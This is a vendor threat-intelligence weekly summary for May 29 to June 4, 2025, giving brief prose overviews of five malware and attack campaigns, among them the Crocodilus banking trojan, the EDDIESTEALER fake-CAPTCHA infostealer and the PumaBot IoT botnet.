< Back
Padlock with abstrack background

Tags:

Threat intelligence
04 June 2025

Weekly Summary Cyberattacks May 29-June 04

Crocodilus, the new banking malware spreading across Europe and America   

The Android banking Trojan known as Crocodilus has evolved rapidly since its discovery in March 2025. Initially limited to test campaigns in Turkey, it has now been detected in multiple European countries such as Spain and Poland, as well as in South America, including Argentina and Brazil. The latest research shows that it is attacking almost all Spanish banks, indicating a campaign specifically targeting the country. The malware uses malicious ads on social networks such as Facebook to trick users and impersonate bank applications, casinos or browser updates. Among its new features, Crocodilus can add fake contacts to the infected device (such as a supposed “Bank Support”) to facilitate social engineering fraud. It also incorporates technical improvements to avoid detection, such as advanced encryption and code obfuscation. One of its most dangerous functions is the automated collection of seed phrases from cryptocurrency wallets, allowing attackers to take control of victims' digital assets.  

Massive cryptojacking campaign exploits misconfigured DevOps tools   

Cybersecurity researchers have detected a global cryptojacking campaign targeting DevOps applications such as Nomad, Consul, Docker and Gitea. The group responsible, identified as JINX-0132, takes advantage of insecure configurations to deploy cryptocurrency mining software without the need for custom malware or proprietary servers, using public versions of the XMRig miner and GitHub repositories. The attack is notable for its “living off open source” approach, making it difficult to detect and track. In the case of Nomad, this is the first time its exploitation is documented in real attacks. JINX-0132 exploits the ability to execute remote code via public APIs without authentication, affecting even high-performance servers. According to the researchers, 25% of cloud environments use these tools, and 30% of those exposed to the Internet have configuration flaws. It is recommended to follow the security practices recommended by developers to avoid falling victim to this type of attack.  

New malware discovered that steals data through fake CAPTCHA pages   

Cybersecurity researchers have identified a new malware called EDDIESTEALER, an infostealer developed in Rust that spreads through campaigns with fake CAPTCHA. Users are tricked via pages that simulate “I'm not a robot” verifications, which copy malicious commands to the clipboard to execute code in PowerShell and download the malware. EDDIESTEALER steals credentials, browser data and cryptocurrency wallets, among others, mainly on Windows systems. The malware stands out for its technical sophistication: it encrypts strings using XOR, hides Windows API calls, self-deletes using alternate NTFS streams, and uses advanced techniques to evade scanning environments. It also collects and transmits system information to a command and control (C2) server, adapting its behavior according to the user's environment. Recent variants have been detected with extended capabilities such as stealing passwords from browsers using WebSocket and DevTools. The use of the Rust language complicates its analysis and marks a growing trend in modern malware development.  

Malware hidden in fake AI tools installers   

Cybersecurity researchers have detected a new wave of cyber threats posing as artificial intelligence (AI) tool installers. These include the CyberLock and Lucky_Gh0$t ransomware, as well as a newly identified destructive malware called Numero. These threats disguise themselves as legitimate AI applications, exploiting the rise of these technologies in sectors such as sales, technology and marketing. CyberLock, developed in PowerShell, encrypts files and demands ransom in Monero falsely claiming it will go to humanitarian aid. Lucky_Gh0$t, a variant of Yashma ransomware, is distributed as a purported ChatGPT installer, while Numero disables systems by manipulating the Windows GUI after masquerading as an AI video creation tool. Attackers employ techniques such as deceptive search engine optimization (SEO poisoning), social networks and platforms such as Telegram to distribute these malicious files. Organizations run the risk of compromising sensitive data if they download these fake tools, underscoring the need to carefully verify sources and opt only for trusted vendors.  

PumaBot, a botnet attacking IoT surveillance devices, discovered   

Cybersecurity researchers have identified a new botnet called PumaBot, developed in Go and designed to attack Linux-based IoT devices, especially surveillance cameras. Unlike other threats, PumaBot does not perform mass scans, but instead receives specific targets from a command and control (C2) server and gains brute-force access via SSH. Once inside, it executes remote commands, masquerades as a legitimate system file and creates persistent services to maintain control of the device. In addition, it inserts its own SSH keys for continued access and deploys additional tools such as “networkxm” and “ddaemon” to expand its capabilities and ensure its survival. It even replaces key system components such as PAM to intercept login credentials.